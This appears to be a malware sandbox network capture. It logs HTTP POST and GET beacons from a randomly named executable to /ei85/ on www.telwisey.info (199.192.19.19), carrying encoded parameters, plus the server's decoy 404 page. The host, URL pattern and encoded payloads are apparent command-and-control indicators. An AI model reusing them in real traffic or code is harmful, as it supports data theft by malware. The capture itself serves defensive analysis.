39 41 3d 3d Data Ascii: _Z1XhZu=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/Yudg4PxSiW43IfwVnFByyQzDWPMnpLEXVpT75l1zlr9A==
Aug 9, 2024 08:42:52.428436041 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:42:52 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 9, 2024 08:42:52.428461075 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 9, 2024 08:42:52.428541899 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 9, 2024 08:42:52.428556919 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 9, 2024 08:42:52.428571939 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 9, 2024 08:42:52.428589106 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 9, 2024 08:42:52.428611994 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 9, 2024 08:42:52.428875923 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 9, 2024 08:42:52.428891897 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 9, 2024 08:42:52.428910017 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 9, 2024 08:42:52.433643103 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49747	199.192.19.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:54.344116926 CEST	1819	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1248 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 5f 5a 31 58 68 5a 75 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 63 4d 6a 4a 54 30 37 6f 52 72 66 73 30 2b 46 44 59 2f 32 58 53 63 38 47 4e 6b 78 6a 6e 55 4c 6a 54 39 77 6d 4f 6f 4a 68 35 4e 54 6b 68 44 56 4d 67 32 78 79 55 2b 76 74 74 30 74 70 53 50 71 7a 6c 44 68 36 6a 4d 4e 6e 35 55 47 4b 46 61 67 36 47 70 57 47 31 59 52 72 45 32 64 42 55 62 43 6f 56 73 43 36 4b 6e 55 38 65 5a 33 65 71 6f 69 38 71 37 4a 75 79 4c 45 6a 57 57 37 62 75 51 35 67 59 4a 33 4e 51 48 74 37 59 51 52 6d 31 4b 30 4f 7a 68 43 47 57 74 33 41 49 68 51 4c 61 71 2f 73 [TRUNCATED] Data Ascii: _Z1XhZu=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6cMjJT07oRrfs0+FDY/2XSc8GNkxjnULjT9wmOoJh5NTkhDVMg2xyU+vtt0tpSPqzlDh6jMNn5UGKFag6GpWG1YRrE2dBUbCoVsC6KnU8eZ3eqoi8q7JuyLEjWW7buQ5gYJ3NQHt7YQRm1K0OzhCGWt3AIhQLaq/sEswRjQNL4HK/u+DB9P+9VxL2jRc73/eB/FE8lpbq1JmnkoadOYliePgZsSn4bbRL96Bhz2pSM+TgEM/eys01A+Y9Oqc9xlAI1BLDY9TzSy4L6HaPmVM1kf5JvtFhaZ9th4g4CtloySN/r4WiFP1EuJEa0SX42ZfskJRWxg+TmN4lpMj/s5ApusUyyLF9d0J98SbWtlYi7SstnfGp2rs99VPvjimwRNEKfS7yiimTjeAKbtc2ZUgG+oLOuBkD6Wr+oJsCBqaNMHwuhGoUEO0vdsd9i3KqjGUMYHU6z2REd1viXCzEmu87RA/0s40MVJtZ2Gur2kSIJ8My9F6mixvQ527VF1FDKcNKWrbCgh1oGOIh+AkXVkGD+7nn6I/dwwm6bybc/9vpjx24bs3jjP06xHli26x5m9nJh1tZzWHe1ptGq6dzKFaUrqYuGOSnpRTtiFkuORFtIrPuxVPHfqLKjoiWnvrvj6aQgT00vLZr36PlnqDpn6uC2mMtD0VdRpapadGqOxryfglA866S0dD0aIgi3j8ExwmIyEYAskIyYvqoibJ6qTYNn+YAdkLE0iw5piQjAFWfqWfEsV6fFHh/SWnM86XmF4nUE5b/AmRBCq5zE6KZpUAhb384pHkl0WKpU08SztsYrIYlllppgZmRGxjXQPA0a6tegs [TRUNCATED]
Aug 9, 2024 08:42:55.038347006 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:42:54 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 9, 2024 08:42:55.038362980 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 9, 2024 08:42:55.038404942 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 9, 2024 08:42:55.038415909 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 9, 2024 08:42:55.038428068 CEST	896	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 9, 2024 08:42:55.038737059 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 9, 2024 08:42:55.038748026 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 9, 2024 08:42:55.038758039 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 9, 2024 08:42:55.038844109 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 9, 2024 08:42:55.038855076 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 9, 2024 08:42:55.043406010 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	49748	199.192.19.19	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:42:56.876013041 CEST	520	OUT	GET /ei85/?_Z1XhZu=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXmR9pLGqH3EvMjHhfUWkhMRoKhXKvOJM+sAfODt1eiuBVWJfBsEk=&f6Gp=VzB4OR5 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.telwisey.info Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:42:57.475004911 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Fri, 09 Aug 2024 06:42:57 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 9, 2024 08:42:57.475024939 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
Aug 9, 2024 08:42:57.475035906 CEST	1236	IN	Data Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
Aug 9, 2024 08:42:57.475311041 CEST	1236	IN	Data Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
